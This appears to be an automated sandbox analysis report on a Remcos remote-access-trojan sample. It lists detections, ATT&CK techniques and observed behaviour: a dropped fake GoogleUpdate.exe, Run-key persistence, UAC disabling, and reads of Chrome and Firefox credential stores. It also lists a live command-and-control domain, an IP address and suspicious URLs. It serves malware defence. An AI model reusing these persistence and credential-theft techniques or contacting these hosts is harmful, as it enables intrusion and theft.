                  Source: Yara matchFile source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DB5rQYsfd6.exe PID: 7308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 8112, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 8180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 1184, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 1608, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7592, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7844, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\bootdata\logs.dat, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPED
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040A953
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data10_2_0040A953
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data13_2_02D5A953
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data15_2_0040A953
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data18_2_0040A953
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040AA71
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: \key3.db0_2_0040AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\10_2_0040AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: \key3.db10_2_0040AA71
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\13_2_02D5AA71
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \key3.db13_2_02D5AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\15_2_0040AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: \key3.db15_2_0040AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\18_2_0040AA71
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: \key3.db18_2_0040AA71

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: DB5rQYsfd6.exe, type: SAMPLE
                  Source: Yara matchFile source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DB5rQYsfd6.exe PID: 7308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 8112, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 8180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 1184, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 1608, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7592, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: GoogleUpdate.exe PID: 7844, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\bootdata\logs.dat, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPED
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: cmd.exe0_2_0040567A
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: cmd.exe10_2_0040567A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: cmd.exe13_2_02D5567A
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: cmd.exe15_2_0040567A
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: cmd.exe18_2_0040567A
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information11
                  Scripting
                  Valid Accounts12
                  Native API
                  11
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  11
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts112
                  Command and Scripting Interpreter
                  1
                  DLL Side-Loading
                  1
                  Access Token Manipulation
                  1
                  Deobfuscate/Decode Files or Information
                  211
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol211
                  Input Capture
                  22
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  1
                  Windows Service
                  1
                  Windows Service
                  2
                  Obfuscated Files or Information
                  2
                  Credentials In Files
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares3
                  Clipboard Data
                  1
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron11
                  Registry Run Keys / Startup Folder
                  322
                  Process Injection
                  1
                  DLL Side-Loading
                  NTDS3
                  File and Directory Discovery
                  Distributed Component Object ModelInput Capture22
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                  Registry Run Keys / Startup Folder
                  1
                  Modify Registry
                  LSA Secrets33
                  System Information Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials121
                  Security Software Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync1
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job322
                  Process Injection
                  Proc Filesystem2
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589220 Sample: DB5rQYsfd6.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 61 apleegodfivem.ddns.net 2->61 63 Suricata IDS alerts for network traffic 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 14 other signatures 2->69 11 DB5rQYsfd6.exe 6 5 2->11         started        15 GoogleUpdate.exe 2->15         started        17 GoogleUpdate.exe 2->17         started        19 4 other processes 2->19 signatures3 process4 file5 51 C:\ProgramDatabehaviorgraphoogleDatbehaviorgraphoogleUpdate.exe, PE32 11->51 dropped 53 C:\Users\user\AppData\Local\...\install.vbs, data 11->53 dropped 55 C:\...behaviorgraphoogleUpdate.exe:Zone.Identifier, ASCII 11->55 dropped 95 Creates an undocumented autostart registry key 11->95 97 Contains functionalty to change the wallpaper 11->97 99 Contains functionality to steal Chrome passwords or cookies 11->99 101 3 other signatures 11->101 21 wscript.exe 1 11->21         started        24 cmd.exe 1 11->24         started        signatures6 process7 signatures8 81 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->81 26 cmd.exe 1 21->26         started        83 Uses cmd line tools excessively to alter registry or file data 24->83 28 reg.exe 1 24->28         started        31 conhost.exe 24->31         started        process9 signatures10 33 GoogleUpdate.exe 3 4 26->33         started        38 conhost.exe 26->38         started        103 Disables UAC (registry) 28->103 process11 dnsIp12 57 apleegodfivem.ddns.net 33->57 59 198.50.242.157 OVHFR Canada 33->59 49 C:\ProgramData\bootdata\logs.dat, data 33->49 dropped 71 Antivirus detection for dropped file 33->71 73 Multi AV Scanner detection for dropped file 33->73 75 Contains functionalty to change the wallpaper 33->75 79 9 other signatures 33->79 40 svchost.exe 33->40         started        43 cmd.exe 33->43         started        file13 77 Uses dynamic DNS services 57->77 signatures14 process15 signatures16 85 Found evasive API chain (may stop execution after checking mutex) 40->85 87 Contains functionalty to change the wallpaper 40->87 89 Contains functionality to steal Chrome passwords or cookies 40->89 93 2 other signatures 40->93 91 Uses cmd line tools excessively to alter registry or file data 43->91 45 conhost.exe 43->45         started        47 reg.exe 1 43->47         started        process17

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  DB5rQYsfd6.exe89%ReversingLabsWin32.Trojan.Remcos
                  DB5rQYsfd6.exe85%VirustotalBrowse
                  DB5rQYsfd6.exe100%AviraBDS/Backdoor.Gen
                  DB5rQYsfd6.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\install.vbs100%AviraVBS/Runner.VPD
                  C:\ProgramData\GoogleDat\GoogleUpdate.exe100%AviraBDS/Backdoor.Gen
                  C:\ProgramData\GoogleDat\GoogleUpdate.exe100%Joe Sandbox ML
                  C:\ProgramData\GoogleDat\GoogleUpdate.exe89%ReversingLabsWin32.Trojan.Remcos
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  apleegodfivem.ddns.net100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  apleegodfivem.ddns.net
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    apleegodfivem.ddns.nettrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpGoogleUpdate.exefalse
                      high
                      http://geoplugin.net/json.gp/CDB5rQYsfd6.exe, GoogleUpdate.exe.0.drfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        198.50.242.157
                        unknownCanada
                        16276OVHFRtrue
                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1589220
                        Start date and time:2025-01-11 20:06:05 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 10m 17s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:28
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:DB5rQYsfd6.exe
                        renamed because original name is a hash value
                        Original Sample Name:991e707e324731f86a43900e34070808.exe
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.evad.winEXE@26/4@49/1
                        EGA Information:
                        • Successful, ratio: 80%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 51
                        • Number of non-executed functions: 354
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 184.28.90.27, 172.202.163.200, 13.107.246.45
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target GoogleUpdate.exe, PID 8112 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Reached maximum number of 1000 Suricata alerts, please consult the 'Suricata Logs'
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size exceeded maximum capacity and may have missing network information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        TimeTypeDescription
                        14:07:30API Interceptor3371723x Sleep call for process: GoogleUpdate.exe modified
                        19:06:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdater "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                        19:07:05AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdater "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                        19:07:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdater "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        198.50.242.1576THNtWwZbKGet hashmaliciousUnknownBrowse
                          r7jYRiiUEnGet hashmaliciousUnknownBrowse
                            Josho.x86Get hashmaliciousUnknownBrowse
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              OVHFRhttps://ville-tonnerre.com/CR_CM/config/information.php?access.x61307366953&&data.x=en_3abae6f9aa37b42f5c9bf622cGet hashmaliciousUnknownBrowse
                              • 213.186.33.19
                              Yv24LkKBY6.exeGet hashmaliciousUnknownBrowse
                              • 94.23.158.211
                              Yv24LkKBY6.exeGet hashmaliciousUnknownBrowse
                              • 94.23.158.211
                              lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 151.80.4.227
                              4.elfGet hashmaliciousUnknownBrowse
                              • 164.133.191.35
                              frosty.x86.elfGet hashmaliciousMiraiBrowse
                              • 51.178.95.194
                              https://www.depoqq.win/genoGet hashmaliciousUnknownBrowse
                              • 54.36.150.184
                              RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                              • 51.195.88.199
                              https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DwyWG_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLQ6-2Bsxhj60Ehn0XDEyVD6MCEZ1gioYU2lwgwkCuP2dHRX-2FYdZnQ31dEdwKW37GtXYj9HmZ1F0YrZWwSELmaO5K7noqwYAhu2QGcGqOtQYdjShoJMVTWOe6BTzZXQxib8Y6rd4SX-2BUwZMt-2BbgPIpal6PcS8i4PCSiFy8RF-2Ftt22Wpj713n23BIU6an4375YDP3Get hashmaliciousUnknownBrowse
                              • 51.38.120.206
                              https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2BpuOeo6wXhYyQnN5Dmhl9EwD4jJy2QucAxD5PJ8TFaAtq5-2Fa2JLywFyD22uAsFmhYjQLp65IuicFXReMolU22hvgQ-2B1S2bacC3gnzhuRxI8SAkOsPFFxOcYEiSSZTqVyp3m1OxPmLRrTi1o5-2FZom3YCyV1EUto77Rrvablg0dLCkGGW0ncnt-2B7IgK6LBBZRD7ITvGmpDjZtTYsz0I1qKiLzZdNfmubxarfJC5-2BcEqOw-2Ft-2FbdrugnVMUWHAHioUxjwvqr4QWKZSVt-2BeoNRvP2Adsk-2FRWXyTy-2FNsOG5tm8W5iiSHTNAe6b2ve-2F-2FMif4OPRLC2jk2zIHDBodMQqimJe7S-2B0c0a6VcurrTf-2BSSIJw1siTQylKaBjy96o6v7aWNACMPOJmDH5ybp8Hfg60OUEGx1ZLebRMpxX9k9AP7u40PlQ7YN0etELZUsiTbXY4PcX2P96RfnnTH8k4gdprbyM68BwIDNXqkSpWupXgXawXvLifC6eFYgMzHs5EFbgb5u6HEHo2__tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcL7zwYzcSR3guHWoKhXDu5EQ7SXJZpci4hCmpp1REa7W1YXEAS6JqnE9LrlFK998LZ271LMIRubQetxBOsHxh3FfsHQej0U45DqU0JnGYKUA9waD6Ny-2BL9vchurlVMDvBupSQHaqHAKs87lmzkMbvNLGI-2BMPx7o1UJrTBuhk-2BVx-2FdFVsZL4Uf2HUcBJTS73hyiGet hashmaliciousUnknownBrowse
                              • 51.75.86.98
                              No context
                              No context
                              Process:C:\Users\user\Desktop\DB5rQYsfd6.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):480256
                              Entropy (8bit):6.5897169192258875
                              Encrypted:false
                              SSDEEP:12288:wmnk7iLJbpIpiRL6I2WhSKQ9ZsfZQScn9:wiLJbpI7I2WhQqZ7c9
                              MD5:991E707E324731F86A43900E34070808
                              SHA1:5B5AFD8CECB865DE3341510F38D217F47490EEAD
                              SHA-256:32D8C2A1BB4D5A515D9EB36C1286B0AC08624C8EA3DF0E97F12391558CE81153
                              SHA-512:07411DFFBC6BEFF08A901AFA8DB3AF4BC7D214407F7B20A8570E16B3900F512AD8EE2D04E31BB9D870585B9825E9102078F6C40EB6DF292F09FFFE57EEA37F79
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: unknown
